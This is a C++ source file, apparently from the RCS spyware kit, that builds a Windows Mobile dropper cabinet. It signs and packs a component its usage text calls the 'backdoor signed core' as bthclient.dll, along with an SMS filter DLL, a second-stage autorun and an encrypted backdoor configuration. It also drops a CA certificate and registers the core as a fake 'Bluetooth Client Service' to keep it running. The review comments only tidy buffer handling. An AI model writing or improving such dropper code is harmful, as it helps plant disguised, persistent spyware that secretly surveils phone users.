RCSMDropper/RCSWinMoDropper.cpp
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <wchar.h>
#include "dropper.h"
extern BOOL SignMobileComponent(TCHAR *wsFile, TCHAR *wsCert);
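/*
 * Copies one command-line path into a MAX_PATH-sized WCHAR buffer.
 *
 * The original code did wsprintf(dst, L"%s", argv[i]) with no length check,
 * so an over-long argument ran straight past the end of the stack buffer.
 * Here an argument that does not fit (including the terminator) is rejected
 * with a message and FALSE instead of being copied.
 *
 * NOTE(review): like the original L"%s" formatting of argv, this assumes a
 * UNICODE build where _TCHAR is WCHAR; in an ANSI build this no longer
 * compiles silently-wrong, it fails to compile at wcslen().
 */
static BOOL CopyArgPath(WCHAR *dst, const _TCHAR *src, const char *label)
{
    size_t len = wcslen(src);
    if (len >= MAX_PATH) {
        printf("ERROR: %s path is too long (%u chars, limit %u)\n",
               label, (unsigned)len, (unsigned)(MAX_PATH - 1));
        return FALSE;
    }
    wcsncpy(dst, src, MAX_PATH - 1);
    dst[MAX_PATH - 1] = L'\0';   /* wcsncpy does not guarantee termination */
    return TRUE;
}

/*
 * Opens `path` read-only and immediately closes it, so a missing or
 * unreadable input is reported before any signing or packing starts.
 *
 * NOTE(review): this is a usability probe, not a security check. The file
 * can change (or be replaced) between this call and the later
 * SignMobileComponent()/AddFile() that actually consumes it, so those calls
 * must, and do, report their own failures.
 *
 * dwFlagsAndAttributes is 0 (the original passed NULL, which is a pointer
 * constant used where a DWORD is expected; the value is the same).
 */
static BOOL ProbeReadable(const WCHAR *path, const char *label)
{
    HANDLE h = CreateFile(path, GENERIC_READ, FILE_SHARE_READ, NULL,
                          OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) {
        printf("Cannot find %s file [%S]\n", label, path);
        return FALSE;
    }
    CloseHandle(h);
    return TRUE;
}

/*
 * Signs `file` with the PFX at `pfx` via SignMobileComponent() and reports
 * the outcome. `what` is only used in the progress message.
 */
static BOOL SignOrReport(WCHAR *file, WCHAR *pfx, const char *what)
{
    if (!SignMobileComponent(file, pfx)) {
        printf("Cannot sign with PFX file [%S]\n", pfx);
        return FALSE;
    }
    printf("Using PFX to sign %s... ok\n", what);
    return TRUE;
}

/*
 * Adds `srcFile` to the cabinet under `devicePath` (the name the file gets
 * inside the archive) via AddFile() and reports the outcome.
 *
 * `devicePath` is copied into a local WCHAR buffer first, as the original
 * did with wsprintf(), so AddFile() receives a writable WCHAR* regardless of
 * how its parameter is declared in dropper.h. All callers pass short
 * literals, well inside MAX_PATH.
 */
static BOOL PackOrReport(const WCHAR *devicePath, WCHAR *srcFile, const char *what)
{
    WCHAR dropPath[MAX_PATH];
    wsprintf(dropPath, L"%s", devicePath);
    if (!AddFile(dropPath, srcFile)) {
        printf("Cannot add %s to cab [%S]\n", what, srcFile);
        return FALSE;
    }
    printf("Adding %s to cab... ok\n", what);
    return TRUE;
}

/*
 * Adds the HKLM\Services\<core> key, its values, and the RegService()
 * entry to the cabinet.
 *
 * Every call is attempted even after one fails (as in the original), so the
 * caller gets a single failure report; unlike the original `ret &= ...`
 * the result no longer depends on the callees returning exactly TRUE (1):
 * any non-zero return counts as success, any zero as failure.
 *
 * NOTE(review): DWORD payloads are passed by value cast to LPVOID, which is
 * the convention the original used with AddRegistryValue(); the meaning of
 * Order=9, Index=0 and Keep=1 is not visible here — confirm against
 * dropper.h / the target's services.exe conventions.
 */
static BOOL AddCoreServiceKeys(WCHAR *core)
{
    WCHAR keyPath[MAX_PATH];
    WCHAR dllName[MAX_PATH];
    BOOL ok = TRUE;

    wsprintf(keyPath, L"Services\\%s", core);
    if (!AddRegistryKey(HKEY_LOCAL_MACHINE, keyPath)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\FriendlyName", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeWString, (LPVOID)L"Bluetooth Client", 0)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\Dll", core);
    wsprintf(dllName, L"%s.dll", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeWString, (LPVOID)dllName, 0)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\Order", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeDword, (LPVOID)9, 0)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\Index", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeDword, (LPVOID)0, 0)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\Keep", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeDword, (LPVOID)1, 0)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\Prefix", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeWString, (LPVOID)L"BTC", 0)) ok = FALSE;

    wsprintf(keyPath, L"Services\\%s\\Description", core);
    if (!AddRegistryValue(HKEY_LOCAL_MACHINE, keyPath, typeWString, (LPVOID)L"Bluetooth Client Service", 0)) ok = FALSE;

    if (!RegService(L"BTC", core, 0)) ok = FALSE;

    return ok;
}

/*
 * Entry point. Builds the installer cabinet from seven file arguments:
 *
 *   argv[1] core         pre-signed core DLL, packed as \Windows\bthclient.dll
 *   argv[2] smsfilter    DLL, signed here, packed as \Windows\SmsFilter.dll
 *   argv[3] secondstage  autorun, signed here, packed as \Windows\autorun2.exe
 *   argv[4] config       encrypted configuration blob
 *   argv[5] cert         CA certificate, packed as cert.cer
 *   argv[6] pfx          private key used by SignMobileComponent()
 *   argv[7] output       cabinet to write
 *
 * Steps, in order: argument copy (bounded), readability probe of the six
 * inputs, signing, AddFile() of the five payloads, registry entries for the
 * core service, CreateArchive(). The first failure aborts with
 * ERROR_EMBEDDING (from dropper.h); a failed CreateArchive() also deletes
 * the partial output. A wrong argument count prints usage and returns 0,
 * as before.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    WCHAR wsCoreFile[MAX_PATH];
    WCHAR wsSmsFile[MAX_PATH];
    WCHAR wsSecondFile[MAX_PATH];
    WCHAR wsConfigFile[MAX_PATH];
    WCHAR wsCertFile[MAX_PATH];
    WCHAR wsPFXFile[MAX_PATH];
    WCHAR wsOutFile[MAX_PATH];

    if (argc != 8) {
        printf("ERROR: \n");
        printf(" usage: RCSWinMoDropper.exe <core> <smsfilter> <secondstage> <config> <cert> <pfx> <output>\n\n");
        printf(" <core> is the backdoor signed core\n");
        printf(" <smsfilter> is the smsfilter dll\n");
        printf(" <secondstage> is the second stage autorun\n");
        printf(" <config> is the backdoor encrypted configuration\n");
        printf(" <cert> is the CA cert to be dropped\n");
        printf(" <pfx> is the private key for the signing process\n");
        printf(" <output> is the output file\n\n");
        return 0;
    }

    /* Bounded copies: an over-long argument is an error, not an overflow. */
    if (!CopyArgPath(wsCoreFile,   argv[1], "core")        ||
        !CopyArgPath(wsSmsFile,    argv[2], "smsfilter")   ||
        !CopyArgPath(wsSecondFile, argv[3], "secondstage") ||
        !CopyArgPath(wsConfigFile, argv[4], "config")      ||
        !CopyArgPath(wsCertFile,   argv[5], "cert")        ||
        !CopyArgPath(wsPFXFile,    argv[6], "pfx")         ||
        !CopyArgPath(wsOutFile,    argv[7], "output")) {
        return ERROR_EMBEDDING;
    }

    /************************************************************************/
    /* SANITY CHECKS (early, friendlier error; see ProbeReadable on TOCTOU) */
    /************************************************************************/
    if (!ProbeReadable(wsCoreFile,   "Core")         ||
        !ProbeReadable(wsSmsFile,    "SMS filter")   ||
        !ProbeReadable(wsSecondFile, "Second Stage") ||
        !ProbeReadable(wsConfigFile, "Config")       ||
        !ProbeReadable(wsCertFile,   "Cert")         ||
        !ProbeReadable(wsPFXFile,    "PFX")) {
        return ERROR_EMBEDDING;
    }

    /************************************************************************/
    /* READY TO GO */
    /************************************************************************/
    printf("Ready to go...\n");
    printf("CORE [%S]\n", wsCoreFile);
    printf("SMSFILTER [%S]\n", wsSmsFile);
    printf("SECOND STAGE [%S]\n", wsSecondFile);
    printf("CONFIG [%S]\n", wsConfigFile);
    printf("CERT FILE [%S]\n", wsCertFile);
    printf("OUTPUT [%S]\n\n", wsOutFile);

    /************************************************************************/
    /* SIGNING (the core is expected to arrive already signed, per usage)    */
    /************************************************************************/
    if (!SignOrReport(wsSmsFile, wsPFXFile, "SMS filter")) {
        return ERROR_EMBEDDING;
    }
    if (!SignOrReport(wsSecondFile, wsPFXFile, "Second Stage")) {
        return ERROR_EMBEDDING;
    }

    /************************************************************************/
    /* CAB GENERATION */
    /************************************************************************/
    if (!PackOrReport(L"\\Windows\\autorun2.exe", wsSecondFile, "Second Stage")) {
        return ERROR_EMBEDDING;
    }
    if (!PackOrReport(L"\\Windows\\bthclient.dll", wsCoreFile, "Core")) {
        return ERROR_EMBEDDING;
    }
    if (!PackOrReport(L"\\Windows\\SmsFilter.dll", wsSmsFile, "SMS filter")) {
        return ERROR_EMBEDDING;
    }
    if (!PackOrReport(L"\\Windows\\$MS313Mobile\\cptm511.dql", wsConfigFile, "Config")) {
        return ERROR_EMBEDDING;
    }
    if (!PackOrReport(L"cert.cer", wsCertFile, "Cert")) {
        return ERROR_EMBEDDING;
    }

    /* Registry entries registering the core DLL as the "BTC" service.
     * A writable array rather than a pointer-to-literal, since RegService()
     * and the wsprintf() callers take non-const WCHAR*. */
    WCHAR wsCore[] = L"bthclient";
    if (!AddCoreServiceKeys(wsCore)) {
        printf("Cannot write registry informations\n");
        return ERROR_EMBEDDING;
    }

    if (!CreateArchive(wsOutFile)) {
        printf("Cannot create output file [%S]\n", wsOutFile);
        DeleteFile(wsOutFile);   /* do not leave a half-written archive behind */
        return ERROR_EMBEDDING;
    }
    printf("Output file... ok\n");

    return ERROR_SUCCESS;
}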